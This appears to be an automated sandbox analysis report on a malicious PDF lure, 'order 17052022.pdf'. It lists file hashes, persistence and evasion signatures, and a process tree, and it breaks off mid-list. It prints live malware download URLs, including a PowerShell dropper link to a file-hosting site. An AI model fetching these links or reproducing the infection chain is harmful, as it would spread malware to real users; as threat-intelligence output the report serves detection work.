General
Target

order 17052022.pdf

Filesize

30KB

Completed

17-05-2022 19:26

Task

behavioral2

Score
10/10
MD5

f7da10c601fc5c0c2caef9f4e06508ad

SHA1

b1f40f4752866c30fbd6654f4844d13ae2958946

SHA256

0bf9fd42a0dc842dfe8ad1d5fdaa3f74e5e2ff602887dcfdbc14466f51eef6e0

SHA256

999c1cf265bd24b51a75bbe6651b2c5b7637b8df6e89a5740e31b6d9e9a74bff19c5ddd8fb445d42cfbe01f26c92db0afa273480f85895a83530ed68a9a392c3

Malware Config

Extracted

Language ps1
Deobfuscated
URLs
ps1.dropper

https://www.mediafire.com/file/ivgr6qe4jfzd1w9/14.dll/file

Signatures 16

Filter: none

Defense Evasion
Discovery
Persistence
  • Executes dropped EXE
    ddond.com

    Reported IOCs

    pidprocess
    4992ddond.com
  • Adds Run key to start application
    msedge.exe

    TTPs

    Registry Run Keys / Startup FolderModify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Software\Microsoft\Windows\CurrentVersion\Runmsedge.exe
  • Drops file in Program Files directory
    setup.exe

    Reported IOCs

    descriptioniocprocess
    File createdC:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\cc12dc4b-a323-437b-9e64-571415a0833e.tmpsetup.exe
    File opened for modificationC:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220517212452.pmasetup.exe
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Checks processor information in registry
    AcroRd32.exePOWERPNT.EXE

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key opened\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0AcroRd32.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHzAcroRd32.exe
    Key opened\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0POWERPNT.EXE
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHzPOWERPNT.EXE
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameStringPOWERPNT.EXE
  • Creates scheduled task(s)
    schtasks.exe

    Description

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    TTPs

    Scheduled Task

    Reported IOCs

    pidprocess
    3180schtasks.exe
  • Enumerates system info in registry
    msedge.exePOWERPNT.EXE

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key opened\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOSmsedge.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturermsedge.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductNamemsedge.exe
    Key opened\REGISTRY\MACHINE\Hardware\Description\System\BIOSPOWERPNT.EXE
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamilyPOWERPNT.EXE
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKUPOWERPNT.EXE
  • Kills process with taskkill
    taskkill.exetaskkill.exetaskkill.exe

    Tags

    Reported IOCs

    pidprocess
    5860taskkill.exe
    5928taskkill.exe
    3828taskkill.exe
  • Modifies Internet Explorer settings
    AcroRd32.exe

    TTPs

    Modify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATIONAcroRd32.exe
  • Modifies registry class
    msedge.exe

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\msedge.exe
    Key created\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settingsmsedge.exe
  • Suspicious behavior: AddClipboardFormatListener
    POWERPNT.EXE

    Reported IOCs

    pidprocess
    5572POWERPNT.EXE
  • Suspicious behavior: EnumeratesProcesses
    msedge.exemsedge.exeAcroRd32.exemsedge.exemsedge.exemsedge.exeidentity_helper.exe

    Reported IOCs

    pidprocess
    1188msedge.exe
    1188msedge.exe
    1748msedge.exe
    1748msedge.exe
    64AcroRd32.exe
    64AcroRd32.exe
    64AcroRd32.exe
    64AcroRd32.exe
    64AcroRd32.exe
    64AcroRd32.exe
    64AcroRd32.exe
    64AcroRd32.exe
    64AcroRd32.exe
    64AcroRd32.exe
    64AcroRd32.exe
    64AcroRd32.exe
    64AcroRd32.exe
    64AcroRd32.exe
    64AcroRd32.exe
    64AcroRd32.exe
    64AcroRd32.exe
    64AcroRd32.exe
    4500msedge.exe
    4500msedge.exe
    5176msedge.exe
    5176msedge.exe
    5252msedge.exe
    5252msedge.exe
    5360identity_helper.exe
    5360identity_helper.exe
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    msedge.exe

    Reported IOCs

    pidprocess
    4500msedge.exe
    4500msedge.exe
    4500msedge.exe
    4500msedge.exe
    4500msedge.exe
    4500msedge.exe
  • Suspicious use of FindShellTrayWindow
    AcroRd32.exemsedge.exe

    Reported IOCs

    pidprocess
    64AcroRd32.exe
    4500msedge.exe
    4500msedge.exe
    4500msedge.exe
    4500msedge.exe
    4500msedge.exe
    4500msedge.exe
    4500msedge.exe
    4500msedge.exe
    4500msedge.exe
    4500msedge.exe
    4500msedge.exe
    4500msedge.exe
    4500msedge.exe
    4500msedge.exe
    4500msedge.exe
    4500msedge.exe
    4500msedge.exe
    4500msedge.exe
    4500msedge.exe
  • Suspicious use of SetWindowsHookEx
    AcroRd32.exeAdobeARM.exePOWERPNT.EXE

    Reported IOCs

    pidprocess
    64AcroRd32.exe
    64AcroRd32.exe
    64AcroRd32.exe
    64AcroRd32.exe
    64AcroRd32.exe
    64AcroRd32.exe
    5176AdobeARM.exe
    5572POWERPNT.EXE
    5572POWERPNT.EXE
    5572POWERPNT.EXE
    5572POWERPNT.EXE
    5572POWERPNT.EXE
    5572POWERPNT.EXE
  • Suspicious use of WriteProcessMemory
    AcroRd32.exeRdrCEF.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 64 wrote to memory of 21664AcroRd32.exeRdrCEF.exe
    PID 64 wrote to memory of 21664AcroRd32.exeRdrCEF.exe
    PID 64 wrote to memory of 21664AcroRd32.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 3648216RdrCEF.exeRdrCEF.exe
    PID 64 wrote to memory of 348464AcroRd32.exemsedge.exe
    PID 64 wrote to memory of 348464AcroRd32.exemsedge.exe
    PID 216 wrote to memory of 4336216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 4336216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 4336216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 4336216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 4336216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 4336216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 4336216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 4336216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 4336216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 4336216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 4336216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 4336216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 4336216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 4336216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 4336216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 4336216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 4336216RdrCEF.exeRdrCEF.exe
    PID 216 wrote to memory of 4336216RdrCEF.exeRdrCEF.exe
Processes 46
  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\order 17052022.pdf"
    Checks processor information in registry
    Modifies Internet Explorer settings
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of FindShellTrayWindow
    Suspicious use of SetWindowsHookEx
    Suspicious use of WriteProcessMemory
    PID:64
    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
      Suspicious use of WriteProcessMemory
      PID:216
      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=56EC53DF2B66CBC934083B75DF6946BE --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        PID:3648
      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=844C07BE9E116AF808E5ECFD12437D25 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=844C07BE9E116AF808E5ECFD12437D25 --renderer-client-id=2 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:1
        PID:4336
      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=81E7FF4BEE639EC88E4D66CADBF1CFA2 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=81E7FF4BEE639EC88E4D66CADBF1CFA2 --renderer-client-id=4 --mojo-platform-channel-handle=2184 --allow-no-sandbox-job /prefetch:1
        PID:1592
      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=FED20838FB90D99B288D239A6DEDE4A5 --mojo-platform-channel-handle=2560 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        PID:3064
      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6D09F45E2CD1C838820AD835962F84C0 --mojo-platform-channel-handle=2584 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        PID:3828
      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=23538A52D9CE8B9B15013A64AF1D2646 --mojo-platform-channel-handle=1956 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        PID:1348
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/v4sy07laokbd5at/14.ppam/file
      PID:3484
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb62aa46f8,0x7ffb62aa4708,0x7ffb62aa4718
        PID:1472
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,18208547420295663251,11644268674043182771,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
        PID:4776
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,18208547420295663251,11644268674043182771,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:3
        Suspicious behavior: EnumeratesProcesses
        PID:1748
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/v4sy07laokbd5at/14.ppam/file
      Adds Run key to start application
      Enumerates system info in registry
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      PID:4500
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb62aa46f8,0x7ffb62aa4708,0x7ffb62aa4718
        PID:3120
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
        PID:3612
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2412 /prefetch:3
        Suspicious behavior: EnumeratesProcesses
        PID:1188
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2984 /prefetch:8
        PID:1296
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3720 /prefetch:1
        PID:2004
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:1
        PID:4000
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:1
        PID:2836
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4492 /prefetch:8
        PID:1720
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4072 /prefetch:8
        PID:4680
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
        PID:4104
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5692 /prefetch:8
        Suspicious behavior: EnumeratesProcesses
        PID:5176
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
